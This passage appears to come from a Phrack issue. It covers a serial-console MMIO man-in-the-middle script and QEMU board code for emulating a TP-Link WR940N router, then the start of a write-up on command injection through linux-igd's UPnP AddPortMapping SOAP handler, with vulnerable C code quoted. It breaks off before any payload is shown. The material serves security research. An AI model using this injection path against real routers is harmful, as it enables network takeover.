* Send the string `w0x18040008 0x00080000` to turn the front LED blue
* Send the string `w0x18040008 0x00004000` to turn off the front LED
* Send `shutdown` to close the server socket and exit


* MMIO MITM Python Code:

import serial
import time
import socket
import logging

### CONSTS ###
GPIO_OUT = 0x18040008
logger = logging.getLogger(__name__)
logging.basicConfig(filename='bootup.log', 
                    format='"%(asctime)s;%(message)s',
                    datefmt="%H:%M:%S", filemode='w', 
                    encoding='utf-8', level=logging.DEBUG)

def get_response(ser):
  time.sleep(0.02)
  out = b""
  while ser.inWaiting() > 0:
    out += ser.read(1)
  return out

def read_from_phy_memory(ser, address):
  print(f'[*] Reading from Address: 0x{address:08X}...')
  ser.write(bytes(f"md 0x{address:08X} 1\n","UTF-8"))
  out = get_response(ser)
  offset = out.rfind(bytes(f'{address:08x}: ',"UTF-8"))
  value = int(b'0x' +  out[offset + len(bytes(f'{address:08x}: ',
  "UTF-8")):offset + len(bytes(f'{address:08x}: ',"UTF-8")) + 8], 16)
  logging.debug(f"READ:  0x{address:08X}: 0x{value:08X}")
  return value

def write_to_phy_memory(ser, address, value):
  print(f'[*] Writing to Address: 0x{address:08X} with value \
  0x{value:08X}...')
  logging.debug(f"WRITE: 0x{address:08X}: 0x{value:08X}")
  ser.write(bytes(f"mw 0x{address:04X} 0x{value:04X}\n","UTF-8"))
  time.sleep(0.01)

def test_uboot_cmd_line(ser, test_string):
  ser.write(bytes(f"{test_string}\n","UTF-8"))
  out = get_response(ser)
  if bytes(f'Unknown command \'{test_string}\'', "UTF-8") in out:
    return True

def spam_tpl_for_uboot(ser, max_attempts):
  while True:
    ser.write(b'tpl')
    out = get_response(ser)
    if b"ap151>" in out:
      print(f"[+] Router is now in [REDACTED] state with \
      {max_attempts} attempts remaining.")
      return True
    max_attempts -= 1
    if max_attempts == 0:
      print("[-] Unable to get the router into the [REDACTED] state. \
      Try Rebooting...")
      return False

def listen_and_respond(ser, port):
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  try:
    s.bind(("0.0.0.0", port))
  except socket.error as msg:
    print('[-] Bind failed. Error Code : ' + str(msg[0]) + \
    ' Message ' + msg[1])
    return False
  s.listen(1)
  print (f'[*] Socket now listening on port {port}')
  while True:
    conn, addr = s.accept()
    msg = conn.recv(1024)
    while len(msg) > 0:
      if msg == b'exit\n':
        conn.send(bytes('[*] Byeeeeee\n', "UTF-8"))
        conn.close()
        break
      if msg == b'shutdown\n':
        conn.send(bytes('[*] The server is going down down\n', 
        "UTF-8"))
        conn.close()
        s.shutdown(socket.SHUT_WR)
        s.close()
        return
      elif msg[0] == ord('r'):
        # Read Bytes
        addr = int(msg[1:].strip(b'\n'), 16)
        out = read_from_phy_memory(ser, addr)
        conn.send(bytes(hex(out), "UTF-8"))
      elif msg[0] == ord('w'):
        # Write Bytes
        address = msg[1:].split(b" ")[0]
        value = msg[1:].split(b" ")[1].strip(b'\n')
        write_to_phy_memory(ser, int(address, 16), int(value, 16))
        conn.send(b'1')
      msg = conn.recv(1024)

def splash():
  print('[~  *  ~  [WR940N MMIO MITM]  ~  *  ~]')
  print('[>>>>>>>>>>> by: b1ack0wl <<<<<<<<<<<]')

def main():
  ser = serial.Serial(
    port='/dev/ttyUSB1', # Note: Change this for your USB serial device
    baudrate=115200
  )
  already_open = test_uboot_cmd_line(ser, "0wl")
  ser.isOpen()
  if (already_open != True):
    print(f'[*] Attempting to get the WR940N into the Das U-Boot shell...')
    if (spam_tpl_for_uboot(ser, 5000) == False):
      ser.close()
      return
  else:
    print(f"[*] Router is already in the Das U-boot shell :D")
  ser.write(b'\n\n')
  listen_and_respond(ser, 1337)

if __name__ == '__main__':
  splash()
  main()
  print('[*] - Done')


This is the Qemu board code.
* It needs to be put in the `qemu/hw/mips` folder. 
* NOTE: Only GPIO, SPI, and DDR are mapped, it is up to the reader to 
  complete the rest

/*
 * System emulation for the WR940N V6 board, but stripped for Phrack
 * by b1ack0wl <3
 */

#include "qemu/osdep.h"
#include "qapi/error.h"
#include "qemu/datadir.h"
#include "exec/address-spaces.h"
#include "hw/clock.h"
#include "hw/mips/mips.h"
#include "net/net.h"
#include "sysemu/sysemu.h"
#include "hw/boards.h"
#include "hw/loader.h"
#include "elf.h"
#include "hw/sysbus.h"
#include "hw/qdev-properties.h"
#include "qemu/error-report.h"
#include "sysemu/qtest.h"
#include "sysemu/reset.h"
#include "sysemu/runstate.h"
#include "cpu.h"
#include "hw/mips/wr940n.h"

int client_fd = 0; // global lol
#define BIOS_FILENAME "u-boot.bin"

static struct _loaderparams {
    int ram_size;
    const char *kernel_filename;
    const char *kernel_cmdline;
    const char *initrd_filename;
} loaderparams;

typedef struct ResetData {
    MIPSCPU *cpu;
    uint64_t vector;
} ResetData;

static uint64_t load_kernel(void)
{
    uint64_t entry, kernel_high, initrd_size;
    long kernel_size;
    ram_addr_t initrd_offset;

    kernel_size = load_elf(loaderparams.kernel_filename, NULL,
                           cpu_mips_kseg0_to_phys, NULL,
                           &entry, NULL,
                           &kernel_high, NULL, TARGET_BIG_ENDIAN,
                           EM_MIPS, 1, 0);
    if (kernel_size < 0) {
        error_report("could not load kernel '%s': %s",
                     loaderparams.kernel_filename,
                     load_elf_strerror(kernel_size));
        exit(1);
    }

    /* load initrd */
    initrd_size = 0;
    initrd_offset = 0;
    if (loaderparams.initrd_filename) {
        initrd_size = get_image_size(loaderparams.initrd_filename);
        if (initrd_size > 0) {
            initrd_offset = ROUND_UP(kernel_high, INITRD_PAGE_SIZE);
            if (initrd_offset + initrd_size > loaderparams.ram_size) {
                error_report(
                "memory too small for initial ram disk '%s'",
                             loaderparams.initrd_filename);
                exit(1);
            }
            initrd_size = load_image_targphys(
                loaderparams.initrd_filename,
                initrd_offset, loaderparams.ram_size - initrd_offset);
        }
        if (initrd_size == (target_ulong) -1) {
            error_report("could not load initial ram disk '%s'",
                         loaderparams.initrd_filename);
            exit(1);
        }
    }
    return entry;
}

static void main_cpu_reset(void *opaque)
{
    ResetData *s = (ResetData *)opaque;
    CPUMIPSState *env = &s->cpu->env;

    cpu_reset(CPU(s->cpu));
    env->active_tc.PC = s->vector;
}


static void connect_to_mmio_server(void){
    int status;
    struct sockaddr_in serv_addr;
    if ((client_fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("\n Socket creation error \n");
        return;
    }
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(1337);

    if (inet_pton(AF_INET, "127.0.0.1", &serv_addr.sin_addr)
        <= 0) {
        puts(
            "\n[*] bruh...");
        return;
    }

    if ((status
         = connect(client_fd, (struct sockaddr*)&serv_addr,
                   sizeof(serv_addr))) < 0) {
        puts("\n[-] Connection to the MMIO MITM interface failed...");
        puts("[*] Is the MMIO MITM script even running?!?!");
        exit(-1); // We need the interface to be up
        return;
    }
}

static int read_mmio_mitm(int address){
    int valread, ret_val = 0;
    char buffer[128] = { 0 };
    snprintf(buffer, sizeof(buffer), "r0x%x", address);
    send(client_fd, buffer, strlen(buffer), 0);
    memset(buffer, 0, sizeof(buffer));
    valread = read(client_fd, buffer, sizeof(buffer) - 1);
    if (valread){
        ret_val =  strtol(buffer, NULL, 16);
    }
    return ret_val;
}

static int write_mmio_mitm(int address, int value){
    int valread, ret_val = 0;
    char buffer[128] = { 0 };
    snprintf(buffer, sizeof(buffer), "w0x%x 0x%x", address, value);
    send(client_fd, buffer, strlen(buffer), 0);
    memset(buffer, 0, sizeof(buffer));
    valread = read(client_fd, buffer, sizeof(buffer) - 1);
    if (valread){
        ret_val = atoi(buffer);
    }
    return ret_val;
}

// MMIO Callbacks for GPIO
static uint64_t gpio_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    int base_addr = 0x18040000;
    int ret_val = 0;
    ret_val = read_mmio_mitm(base_addr + addr);
    return ret_val;
}

static void gpio_mmio_write(void *opaque, hwaddr addr,
                               uint64_t val, unsigned size)
{
    int base_addr = 0x18040000;
    if (addr == 0x44){ // This is for UART Multiplexing, skip.
        return;
    }
    write_mmio_mitm(base_addr + addr, val);
    return;
}

static const MemoryRegionOps gpio_mmio_ops = {
    .read  = gpio_mmio_read,
    .write = gpio_mmio_write,
    .endianness = DEVICE_BIG_ENDIAN
};

// MMIO Callbacks for SPI
static uint64_t spi_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    struct SPI_IO *spi_io = opaque;
    switch (addr) {
    case 0x0: 
      return 1;
    case 0x8:
      break;
    case 0xC: // (SPI_READ_DATA_ADDR)
      spi_io->cmd = ((spi_io->cmd & 0x0F) << 4 | (spi_io->cmd & 0xF0) >> 4 
      | (spi_io->cmd & 0xF000) >> 4 | (spi_io->cmd & 0xF00) << 4  | 
      (spi_io->cmd & 0xF0000) << 4 | (spi_io->cmd & 0xF00000) >> 4 | 
      (spi_io->cmd & 0xF000000) << 4 | (spi_io->cmd & 0xF0000000) >> 4);
      if (spi_io->cmd == 0x9F){
        spi_io->cmd = 0;
        return 0x1337;
      }
      break;
    default:
      break;
    }

   return 0;
}

static void spi_mmio_write(void *opaque, hwaddr addr,
                               uint64_t val, unsigned size)
{
    struct SPI_IO *spi_io = opaque;
    switch (addr) {
    case 0x0: 
      break;
    case 0x8: // (SPI_IO_CONTROL_ADDR)
      if ((val == 0x70000) && (spi_io->cmd_in_progress == 0)){
        // CS0-2 are high which means disabled
        // reset cmd offset and cmd
        spi_io->cmd_offset = 0;
        spi_io->cmd = 0;
        spi_io->cmd_in_progress = 1;
      }
      else if ((val == 0x70000) && (spi_io->cmd_in_progress == 1)){
        spi_io->cmd_in_progress = 0;
        break;
      }
      if ((val & (1 << 8)) && (val & (1 << 18))){
        // CS2 is low (active)
        // SPI_Clock is high, so grab data value
        if (spi_io->cmd_offset == 32){
          break;
        }
        spi_io->cmd |= (val & 1) << spi_io->cmd_offset;
        spi_io->cmd_offset++;
      }
      break;
    default:
        break;
    }

    return;
}

static const MemoryRegionOps spi_mmio_ops = {
    .read  = spi_mmio_read,
    .write = spi_mmio_write,
    .endianness = DEVICE_BIG_ENDIAN
};


// MMIO Callbacks for DDR
static uint64_t ddr_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    int base_addr = 0x18000000;
    int ret_val = 0;
    ret_val = read_mmio_mitm(base_addr + addr);
    return ret_val;
}

static void ddr_mmio_write(void *opaque, hwaddr addr,
                               uint64_t val, unsigned size)
{
    int base_addr = 0x18000000;
    write_mmio_mitm(base_addr + addr, val);
    return;
}

static const MemoryRegionOps ddr_mmio_ops = {
    .read  = ddr_mmio_read,
    .write = ddr_mmio_write,
    .endianness = DEVICE_BIG_ENDIAN
};

struct fw_sections parse_wr940n_firmware_header(char *filename){
  struct fw_header fw_header;
  struct fw_sections fw_sections;
  FILE *fptr;
  memset(&fw_header, 0, sizeof(fw_header));
  fptr = fopen(filename, "rb");
  fseek(fptr, 0,SEEK_SET);
  size_t read = fread(&fw_header, 1, sizeof(fw_header), fptr);
  if (read != sizeof(fw_header)){
    printf("[-] Error while reading fw image %s\n", filename);
    printf("[-] Read size: %ld\n", read);
  }
  // We need to swap since we're on AyyMD64
  fw_header.version = bswap_32(fw_header.version);
  fw_header.hw_id = bswap_32(fw_header.hw_id);
  fw_header.hw_rev = bswap_32(fw_header.hw_rev);
  fw_header.kernel_la = bswap_32(fw_header.kernel_la);
  fw_header.kernel_ep = bswap_32(fw_header.kernel_ep);
  fw_header.fw_length = bswap_32(fw_header.fw_length);
  fw_header.kernel_ofs = bswap_32(fw_header.kernel_ofs);
  fw_header.kernel_len = bswap_32(fw_header.kernel_len);
  fw_header.rootfs_ofs = bswap_32(fw_header.rootfs_ofs);
  fw_header.rootfs_len = bswap_32(fw_header.rootfs_len);
  fw_header.boot_ofs = bswap_32(fw_header.boot_ofs);
  fw_header.boot_len = bswap_32(fw_header.boot_len);
  fw_header.ver_hi = bswap_16(fw_header.ver_hi);
  fw_header.ver_mid = bswap_16(fw_header.ver_mid);
  fw_header.ver_lo = bswap_16(fw_header.ver_lo);
  printf("[*] Vendor: %s\n", fw_header.vendor_name);
  printf("[*] FW Version: %s\n", fw_header.fw_version);
  printf("[*] fw_header.kernel_la: 0x%08x\n", fw_header.kernel_la);
  printf("[*] fw_header.kernel_ep: 0x%08x\n", fw_header.kernel_ep);
  printf("[*] fw_header.kernel_ofs: 0x%08x\n", fw_header.kernel_ofs);
  printf("[*] fw_header.kernel_len: 0x%08x\n", fw_header.kernel_len);
  printf("[*] fw_header.rootfs_ofs: 0x%08x\n", fw_header.rootfs_ofs);
  printf("[*] fw_header.rootfs_len: 0x%08x\n", fw_header.rootfs_len);
  printf("[*] fw_header.bootlen: 0x%08x\n", fw_header.boot_len);
  printf("[*] fw_header.boot_ofs: 0x%08x\n", fw_header.boot_ofs);
  printf("[*] fw_header.fw_length: 0x%08x\n", fw_header.fw_length);
  fw_sections.boot_loader_len = fw_header.fw_length - 0x200;
  fw_sections.bootloader = g_malloc(fw_sections.boot_loader_len + 1);
  read = fread(fw_sections.bootloader, 1, fw_sections.boot_loader_len, 
               fptr);
  if (read != fw_sections.boot_loader_len){
    printf("[-] Error while reading from file: %s\n", filename);
  }
  return fw_sections;
}

static void
mips_wr940n_init(MachineState *machine)
{
    const char *kernel_filename = machine->kernel_filename;
    const char *kernel_cmdline = machine->kernel_cmdline;
    const char *initrd_filename = machine->initrd_filename;
    char *filename;
    MemoryRegion *address_space_mem = get_system_memory();
    MemoryRegion *gpio_mmio = g_new(MemoryRegion, 1);
    MemoryRegion *ddr_mmio = g_new(MemoryRegion, 1);
    Clock *cpuclk;
    MIPSCPU *cpu;
    CPUMIPSState *env;
    ResetData *reset_info;
    struct fw_sections fw_sections;
    memset(&fw_sections, 0, sizeof(fw_sections));

    // Connect to MMIO Server
    connect_to_mmio_server();

    cpuclk = clock_new(OBJECT(machine), "cpu-refclk");
    clock_set_hz(cpuclk, 200 * 1000000); /* 200 MHz */

    /* Init CPUs. */
    cpu = mips_cpu_create_with_clock(machine->cpu_type, cpuclk);
    env = &cpu->env;

    reset_info = g_new0(ResetData, 1);
    reset_info->cpu = cpu;
    reset_info->vector = 0x9F000400;
    qemu_register_reset(main_cpu_reset, reset_info);

    /* Allocate RAM. */
    memory_region_add_subregion(address_space_mem, 0, machine->ram);

    /* bootloader */
    filename = qemu_find_file(QEMU_FILE_TYPE_BIOS, machine->firmware ?: 
                              BIOS_FILENAME);
    if (filename) {
        fw_sections = parse_wr940n_firmware_header(filename);
        /* Map the BIOS / boot exception handler. */
        memory_region_init_rom(bios, NULL, "WR940NV6.bios.rom", 
                               fw_sections.boot_loader_len, &error_fatal);
        memory_region_add_subregion_overlap(address_space_mem, 0x1F000000, 
                                            bios, 0);
        rom_add_blob_fixed(filename, fw_sections.bootloader, 
                           fw_sections.boot_loader_len, 0x1F000000);
        g_free(filename);
    }
    if (fw_sections.bootloader == 0) {
        /* we don't have a kernel image nor boot vector code.*/
        error_report("Could not load TP-Link FW Image bios '%s'", 
                      machine->firmware);
        exit(1);
    } else {
        /* We have a boot vector start address. */
        env->active_tc.PC = (target_long)(int32_t)0x9F000400;
    }

    /* GPIO */
    memory_region_init_io(gpio_mmio, NULL, &gpio_mmio_ops, NULL, 
                          "GPIO_MMIO", 0x74);
    memory_region_add_subregion(address_space_mem, 0x18040000LL,
                                gpio_mmio);

    /* SPI */ 
    struct SPI_IO *spi_io = g_malloc0(sizeof(struct SPI_IO));
    spi_io->spi_contents = g_malloc0(fw_sections.boot_loader_len+1);
    memcpy(spi_io->spi_contents, fw_sections.bootloader, 
           fw_sections.boot_loader_len);
    memory_region_init_io(spi_mmio, NULL, &spi_mmio_ops, spi_io, 
                          "SPI_MMIO", 0x20);
    memory_region_add_subregion_overlap(address_space_mem, 0x1F000000LL, 
                                        spi_mmio, 1);

    /* DDR */
    memory_region_init_io(ddr_mmio, NULL, &ddr_mmio_ops, NULL, 
                          "DDR_MMIO", 0x160);
    memory_region_add_subregion(address_space_mem, 0x18000000LL, 
                                ddr_mmio);

    if (kernel_filename) {
        loaderparams.ram_size = machine->ram_size;
        loaderparams.kernel_filename = kernel_filename;
        loaderparams.kernel_cmdline = kernel_cmdline;
        loaderparams.initrd_filename = initrd_filename;
        reset_info->vector = load_kernel();
    }

    /* Init CPU internal devices. */
    cpu_mips_irq_init_cpu(cpu);
    cpu_mips_clock_init(cpu);

    memory_region_init_alias(isa, NULL, "isa_mmio",
                             get_system_io(), 0, 0x00010000);
    memory_region_add_subregion(get_system_memory(), 0x1fd00000, 
                                isa);
}

static void mips_wr940n_machine_init(MachineClass *mc)
{
    mc->desc = "TP-Link WR940NV6 Board by b1ack0wl";
    mc->init = mips_wr940n_init;
    mc->default_cpu_type = MIPS_CPU_TYPE_NAME("74Kf");
    mc->default_ram_size = 1 * GiB; // for debug reasons
    mc->default_ram_id = "mips_wr940n.ram";
}

DEFINE_MACHINE("WR940NV6", mips_wr940n_machine_init)


Header File (wr940n.h)
* This needs to be put in the `qemu/include/hw/mips/` folder

#include <byteswap.h>
#include "hw/sysbus.h"
#include "chardev/char-fe.h"
struct fw_sections parse_wr940n_firmware_header(char *filename);

struct fw_sections{
  char *bootloader;
  int boot_loader_len;
  char *kernel;
  int kernel_len;
  char *rootfs;
  int root_fs_len;
};

/* 
lifted from 
https://github.com/jtreml/firmware-mod-kit/blob/master/src
/firmware-tools/mktplinkfw.c
*/
struct fw_header {
  uint32_t  version;  /* header version */
  char    vendor_name[24];
  char    fw_version[36];
  uint32_t  hw_id;    /* hardware id */
  uint32_t  hw_rev;   /* hardware revision */
  uint32_t  unk1;
  uint8_t   md5sum1[16];
  uint32_t  unk2;
  uint8_t   md5sum2[16];
  uint32_t  unk3;
  uint32_t  kernel_la;  /* kernel load address */
  uint32_t  kernel_ep;  /* kernel entry point */
  uint32_t  fw_length;  /* total length of the firmware */
  uint32_t  kernel_ofs; /* kernel data offset */
  uint32_t  kernel_len; /* kernel data length */
  uint32_t  rootfs_ofs; /* rootfs data offset */
  uint32_t  rootfs_len; /* rootfs data length */
  uint32_t  boot_ofs; /* bootloader data offset */
  uint32_t  boot_len; /* bootloader data length */
  uint16_t  ver_hi;
  uint16_t  ver_mid;
  uint16_t  ver_lo;
  uint8_t   pad[354];
};

struct SPI_IO {
    /*< private >*/
    SysBusDevice parent_obj;
    /*< public >*/

    MemoryRegion regs_region;
    CharBackend chr;

    char *spi_contents;
    char model_number[5];
    uint32_t read_offset;
    uint32_t read_len;
    uint8_t  busy_flag;
    uint32_t cmd;
    uint8_t cmd_offset;
    uint8_t cmd_in_progress;
};


Add this board to Qemu by modifying `qemu/hw/mips/meson.build` and 
adding in the following statement:
`mips_ss.add(when: 'CONFIG_WR940N', if_true: files('0wl_wr940n_v6.c'))`

Then, go into `qemu/hw/mips/Kconfig` and add in the following statements:

config WR940N
    bool
    select SERIAL
    select MIPSNET


NOTE: The peripherals above are copied from MIPSSIM, but other included
peripherals can be added if they can be utilized. (e.g XILINX UART)

To run this board, just run the following command after building:
`./qemu-system-mips -s -machine WR940NV6  -bios WR940NV6_FW_FILE 
(e.g. wr940nv6_us_3_20_1_up_boot(220801).bin)`

The board will automatically extract the contents of the WR940Nv6 firmware 
blob, map the bootloader + kernel, and begin execution at Das U-Boot.
You'll see the LED blink a few colors on the physical device and then the 
virtual board should crash due to a MMIO region not being allocated. It 
is up to the reader to complete the rest of the MMIO peripherals while 
using the MITM technique to either narrow in on a specific device 
(e.g. WiFi) or to simply see what's going on during the boot process or 
when a driver is interacting with it.

Happy Hacking :)

--[ References

/!\ AUTHOR_NOTE: If the above link 404s, go to the GPL code center
and look for WR940Nv6: https://www.tp-link.com/us/support/Sgpl-code/



|=-----------------------------------------------------------------------=|
|=--------------=[ 7 - Shell Your Way to Network Mastery ]=--------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[ Gabriel & Thomas ]=-------------------------=|
|=-----------------------------------------------------------------------=|

1 - Abstract
2 - Introduction
3 - White-box audit
4 - Compilation and debugging
5 - Becoming a Bash Jiu Jitsu white belt
6 - Becoming a Bash Jiu Jitsu purple belt
7 - Becoming a Bash Jiu Jitsu black belt
8 - Claiming supremacy over the mats
9 - Conclusion
10 - Acknowledgments
11 - References

---------------------------------------------------------------------------
--[ 1. Abstract

Control over LAN can be achieved by exploiting an old network service that
opens a pathway through HTTP requests. By targeting a vulnerability
in the service request's parsing of parameters, a patient attacker can
force the execution of unauthorized commands as in a command line. This
flow allows bypassing the built-in rulesets that would otherwise block such
exploits, making it possible to gain deeper access. By carefully crafting
unexpected HTTP requests while manipulating specific SOAP payloads, we can
reach what we desire the most, the takeover of the network.

---------------------------------------------------------------------------
--[ 2. Introduction

Universal Plug and Play (UPnP) has long been a subject of concern due to
its widespread use in simplifying network configurations, often at the
expense of security. Originally designed to allow devices to automatically
discover and configure themselves on a network, UPnP relies on the Internet
Gateway Device (IGD), typically a router, to manage inbound and outbound
traffic. However, the very features that make it convenient, such as
automatic port forwarding and NAT traversal, also open doors to exploit.

Over time, Linux IGD implementations, which allow Linux-based systems to
perform similar functions, have become increasingly relevant in the threat
landscape. Despite being an old service, UPnP and its related components
still present a range of vulnerabilities that attackers can exploit. 
The next section will explore how a modified version of linuxigd 
(linux-igd)[1] can be exploited. 

---------------------------------------------------------------------------
--[ 3. White-box audit

The focus of this analysis is on the implementation of linuxigd (linux-igd) 
and its derivatives, such as the reuse of its codebase within SDKs. The 
original code can be found on SourceForge[2]. The service was written in 
C++ at first, but the developers switched to C starting with version 0.95.

                    +----------------------+----------+
                    |       Version        | Language |
                    +----------------------+----------+
                    | gateway-0.71.tgz     | C++      |
                    | gateway-0.75.tgz     | C++      |
                    | gateway-0.90.tgz     | C++      |
                    | gateway-0.91.tgz     | C++      |
                    | linuxigd-0.92.tgz    | C++      |
                    | linuxigd-0.95.tar.gz | C        |
                    | linuxigd-1.0.tar.gz  | C        |
                    +----------------------+----------+

While each version and its changes have been analyzed, the vendor seems to
have modified version 1.0 for its SDK. The code examples below are based on
the vendor's modified source code of the latest version of linuxigd (1.0).
It is up to the reader through firmware analysis to identify examples where
this service codebase is reused in SDKs.

By reading the file pmlist.c source code, several command injections can be
identified in the pmlist_AddPortMapping() and pmlist_DeletePortMapping()
functions.

int pmlist_AddPortMapping(int enabled, char *protocol, char *externalPort,
                          char *internalClient, char *internalPort)
{
    if (enabled)
    {
        ...

        char command[COMMAND_LEN];
        int status;

        {
            ...

            snprintf(command, COMMAND_LEN, "%s -t nat -I %s -i %s -p %s"
                     " --dport %s -j DNAT --to %s:%s", g_vars.iptables,
                     g_vars.preroutingChainName, g_vars.extInterfaceName,
                     protocol, externalPort, internalClient, internalPort);
            trace(3, "%s", command);
            system(command);
            ...
        }

        if (g_vars.forwardRules)
        {
            snprintf(command, COMMAND_LEN, "%s -A %s -p %s"
                     " -d %s --dport %s -j ACCEPT", g_vars.iptables,
                     g_vars.forwardChainName, protocol, internalClient,
                     internalPort);
            trace(3, "%s", command);
            system(command);
            ...
        }
        ...
    }
    return 1;
}

int pmlist_DeletePortMapping(int enabled, char *protocol,
                             char *externalPort, char *internalClient,
                             char *internalPort)
{
    if (enabled)
    {
        ...

        char command[COMMAND_LEN];
        int status;

        {
            ...

            snprintf(command, COMMAND_LEN, "%s -t nat -D %s -i %s -p %s"
                     " --dport %s -j DNAT --to %s:%s", g_vars.iptables,
                     g_vars.preroutingChainName, g_vars.extInterfaceName,
                     protocol, externalPort, internalClient, internalPort);
            trace(3, "%s", command);
            system(command);
            ...
        }

        if (g_vars.forwardRules)
        {
            snprintf(command, COMMAND_LEN, "%s -D %s -p %s"
                     " -d %s --dport %s -j ACCEPT", g_vars.iptables,
                     g_vars.forwardChainName, protocol, internalClient,
                     internalPort);
            trace(3, "%s", command);
            system(command);
            ...
        }
        ...
    }
    return 1;
}


The creation of the string command, with elements controlled by an attacker
supplied as a parameter to the system() function, raises a security issue.
The pmlist_AddPortMapping() function is called by the pmlist_PushBack()
function within the pmlist.c file.

int pmlist_PushBack(struct portMap* item)
{
    int action_succeeded = 0;

    ...

    if (action_succeeded == 1)
    {
        pmlist_AddPortMapping(item->m_PortMappingEnabled,
                              item->m_PortMappingProtocol,
                              item->m_ExternalPort, item->m_InternalClient,
                              item->m_InternalPort);
        return 1;
    }
    else
        return 0;
}


By analyzing the code above, it appears that the values supplied to the
pmlist_AddPortMapping() function are not sanitized. This happens earlier
in the call stack, specifically when the portMap structure is created and
supplied to the pmlist_PushBack() function. This can be observed in the
gatedevice.c file, where the AddPortMapping() function is defined. This
function is called by the SOAP action handler HandleActionRequest(), which
is registered by EventHandler() to process the associated HTTP request.

int AddPortMapping(struct Upnp_Action_Request *ca_event)
{
    char *remote_host = NULL;
    char *ext_port = NULL;
    char *proto = NULL;
    char *int_port = NULL;
    char *int_ip = NULL;
    char *int_duration = NULL;
    char *bool_enabled = NULL;
    char *desc = NULL;
    struct portMap *ret, *new;
    int result;
    char num[5]; // Maximum number of port mapping entries 9999
    IXML_Document *propSet = NULL;
    int action_succeeded = 0;
    char resultStr[RESULT_LEN];

    if (
        (ext_port = GetFirstDocumentItem(ca_event->ActionRequest,
                                         "NewExternalPort")) &&
        (proto = GetFirstDocumentItem(ca_event->ActionRequest,
                                      "NewProtocol")) &&
        (int_port = GetFirstDocumentItem(ca_event->ActionRequest,
                                         "NewInternalPort")) &&
        (int_ip = GetFirstDocumentItem(ca_event->ActionRequest,
                                       "NewInternalClient")) &&
        (int_duration = GetFirstDocumentItem(ca_event->ActionRequest,
                                             "NewLeaseDuration")) &&
        (bool_enabled = GetFirstDocumentItem(ca_event->ActionRequest,
                                             "NewEnabled")) &&
        (desc = GetFirstDocumentItem(ca_event->ActionRequest,
                                     "NewPortMappingDescription")))
    {
        remote_host = GetFirstDocumentItem(ca_event->ActionRequest,
                                           "NewRemoteHost");

        ...
        if ((ret = pmlist_Find(ext_port, proto, int_ip)) != NULL)
        {
            trace(3, "Found port map to already exist.  Replacing");
            pmlist_Delete(ret);
        }

        new = pmlist_NewNode(atoi(bool_enabled), atol(int_duration), "",
                             ext_port, int_port, proto, int_ip, desc);
        result = pmlist_PushBack(new);
        ...
    }
    ...
}


The pmlist_NewNode() function, defined in the pmlist.c file, performs
checks to ensure that the values contained in the SOAP request are valid.
To clarify the information presented so far, the diagram below summarizes
the call stack as neatly as possible.

        +------------------+
        |      main()      |
        +------------------+
                 |
                 v
     +------------------------+
     |     EventHandler()     |
     +------------------------+
                 |
                 v
   +---------------------------+
   |   HandleActionRequest()   |
   +---------------------------+
                 |
                 v
    +--------------------------+
    |     AddPortMapping()     |
    +--------------------------+
              /            \
             v              v
    +------------------+   +---------------------+
    | pmlist_NewNode() |   |  pmlist_PushBack()  |<---+
    +------------------+   +---------------------+    |
             |                        |               |
             |                        |               |
             +----struct portMap------|---------------+
                                      |
                                      v
                         +-------------------------+
                         | pmlist_AddPortMapping() |
                         +-------------------------+
                                     |
                                     v
                              +------------+
                              |  system()  |
                              +------------+

struct portMap* pmlist_NewNode(int enabled, long int duration,
                               char *remoteHost, char *externalPort,
                               char *internalPort, char *protocol,
                               char *internalClient, char *desc)
{
    struct portMap* temp = (struct portMap*) malloc(
                                                    sizeof(struct portMap)
                                                   );

    temp->m_PortMappingEnabled = enabled;

    if (remoteHost && strlen(remoteHost) < sizeof(temp->m_RemoteHost))
        strcpy(temp->m_RemoteHost, remoteHost);
    else
        strcpy(temp->m_RemoteHost, "");

    if (strlen(externalPort) < sizeof(temp->m_ExternalPort))
        strcpy(temp->m_ExternalPort, externalPort);
    else
        strcpy(temp->m_ExternalPort, "");

    if (strlen(internalPort) < sizeof(temp->m_InternalPort))
        strcpy(temp->m_InternalPort, internalPort);
    else
        strcpy(temp->m_InternalPort, "");

    if (strlen(protocol) < sizeof(temp->m_PortMappingProtocol))
        strcpy(temp->m_PortMappingProtocol, protocol);
    else
        strcpy(temp->m_PortMappingProtocol, "");

    if (strlen(internalClient) < sizeof(temp->m_InternalClient))
        strcpy(temp->m_InternalClient, internalClient);
    else
        strcpy(temp->m_InternalClient, "");

    if (strlen(desc) < sizeof(temp->m_PortMappingDescription))
        strcpy(temp->m_PortMappingDescription, desc);
    else
        strcpy(temp->m_PortMappingDescription, "");

    temp->m_PortMappingLeaseDuration = duration;
    temp->next = NULL;
    temp->prev = NULL;

    return temp;
}


To identify the length of each structure field, it is sufficient to read
its definition in the pmlist.h file.

struct portMap
{
  int m_PortMappingEnabled;
  long int m_PortMappingLeaseDuration;
  char m_RemoteHost[16];
  char m_ExternalPort[6];
  char m_InternalPort[6];
  char m_PortMappingProtocol[4];
  char m_InternalClient[16];
  char m_PortMappingDescription[50];

  int expirationEventId;
  long int expirationTime;

  struct portMap* next;
  struct portMap* prev;
} *pmlist_Head, *pmlist_Tail, *pmlist_Current;


The definition of the above structure highlights that, regardless of the
circumstances, the attacker is limited in the number of characters he can
inject into the various fields of the SOAP request, thereby restricting the
commands he can use to exploit the command injection.

---------------------------------------------------------------------------
--[ 4. Compilation and debugging

To study the service's behavior during execution, it is highly recommended
to compile it from source and debug it to streamline the development phase
of the exploit. The compilation phase was likely the most troublesome. As
the service's source code was quite outdated, it took numerous tests and
failures before a solution was found. The solution was to compile and run
the service in a virtual machine (x86_64) using QEMU, with Fedora 21
selected as the guest operating system.

It is not necessary to allocate much storage space, as this machine will
only run the sshd service (for administration) and the targeted service.
A disk can be created with the following command.

$ qemu-img create -f qcow2 fedora21.qcow2 20G

Once the disk is created, the next step is to launch QEMU, specifying the
path to the ISO (the download link is provided in the references
section[3]), and perform a standard Fedora 21 installation.

$ qemu-system-x86_64 \
    -m 4G \
    -smp 4 \
    -cdrom Fedora-Live-Workstation-x86_64-21-5.iso \
